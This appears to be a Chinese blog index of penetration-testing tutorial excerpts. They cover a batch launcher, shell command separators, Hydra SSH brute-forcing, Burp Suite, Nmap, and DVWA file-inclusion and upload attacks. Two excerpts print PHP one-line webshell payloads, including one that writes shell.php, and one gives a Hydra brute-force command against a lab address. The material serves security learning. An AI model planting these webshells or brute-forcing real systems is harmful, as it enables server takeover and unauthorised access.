M_Young的博客

三个文件需要在同一目录下或qidong.txt中给wenben.doc、run.exe加绝对路径。一、将两个文件名wenben.doc、run.exe作为内容写入qidong.txt。双击qidong.bat，将顺序运行wenben.doc、run.exe。run.exe //需要执行的程序。将qidong.txt重命名为qidong.bat。qidong.txt //启动程序。wenben.doc //需要打开的文本。

：||左边为假才执行右边命令；只要有一个命令返回真，后面的命令就不会被执行。：用分号隔开每个命令, 每个命令按照从左到右的顺序执行， 彼此之间不关心是否失败， 所有命令都会执行。：将两个命令隔开，管道符左边命令的输出就会作为管道符右边命令的输入，以此推类。:只有在 && 左边的命令返回真，&& 右边的命令才会被执行。:&放在启动参数后面表示设置此进程为后台进程。

1.海德拉（Hydra）hydra 是世界顶级密码暴力密码破解工具，支持几乎所有协议的在线密码破解，功能强大，其密码能否被破解关键取决于破解字典是否足够强大，在网络安全渗透过程中是一款必备的测试工具。root@kali2019:~# hydra -L userlist.txt -P passwordlist.txt -t 20 192.168.106.134 ssh我们先建立简单的字典...

1.功能模块Target------------目标模块用于设置扫描域(target scope)、生成站点地图(sitemap)、生成安全分析Proxy------------- 代理模块用于拦截浏览器的http会话内容Spider --------------爬虫模块用于自动爬取网站的每个页面内容，并生成完整的网站地图Scanner ------------扫描模块用于自动化检测漏洞，分为主动和被动扫描Intruder --------------入侵（渗透）模块根据上面检测到的可能存在漏洞

工具介绍nmapNmap（“网络映射器”）是一个用于网络探索和安全审计的开源工具。它旨在快速扫描大型网络，尽管它对单个主机也能正常工作。Nmap 以新颖的方式使用原始 IP 数据包来确定网络上可用的主机、这些主机提供的服务（应用程序名称和版本）、它们运行的​​操作系统（和操作系统版本）、数据包过滤器/防火墙的类型正在使用中，以及其他数十种特性。虽然 Nmap 通常用于安全审计，但许多系统和网络管理员发现它对网络库存、管理服务升级计划和监控主机或服务正常运行时间等日常任务很有用。https://nmap

文件包含渗透<?fputs(fopen(‘‘shell.php’’, ‘‘w’’),‘<?php eval($_POST[pass]);?>’)?>注：打开shell.php的文件，并写入<?php eval($_POST[pass]);?>就在本地生成了一句话木马，然后就可以通过菜刀这样的工具连接木马。本地文件包含LFI：（首先需要上传文件，才能修改=后面的文件）192.168.40.108/dvwa/vulnerabilities/fi/index.php

理论分析：网站Web应用都有一些文件上传功能，比如文档、图片、头像、视频上传，当上传功能的实现代码没有严格校验上传文件的后缀和文件类型，此时攻击者就可以上传一个webshell到一个Web可访问的目录上，并将恶意文件传递给如PHP解释器去执行，之后就可以在服务器上执行恶意代码，进行数据库执行、服务器文件管理，服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护。<?php @eval(S_POST[’pass’]);?>一句话木马步骤首先，

一、对Burp intruder的简介Burp Intruder是一个强大的工具，用于自动对Web应用程序自定义的攻击，Burp Intruder 是高度可配置的，并被用来在广范围内进行自动化攻击。你可以使用 Burp Intruder 方便地执行许多任务，包括枚举标识符，获取有用数据，漏洞模糊测试。合适的攻击类型取决于应用程序的情况，可能包括：缺陷测试：SQL 注入，跨站点脚本，缓冲区溢出，路径遍历；暴力攻击认证系统；枚举；操纵参数；拖出隐藏的内容和功能；会话令牌测序和会话劫持；数据挖掘；并发攻击；应用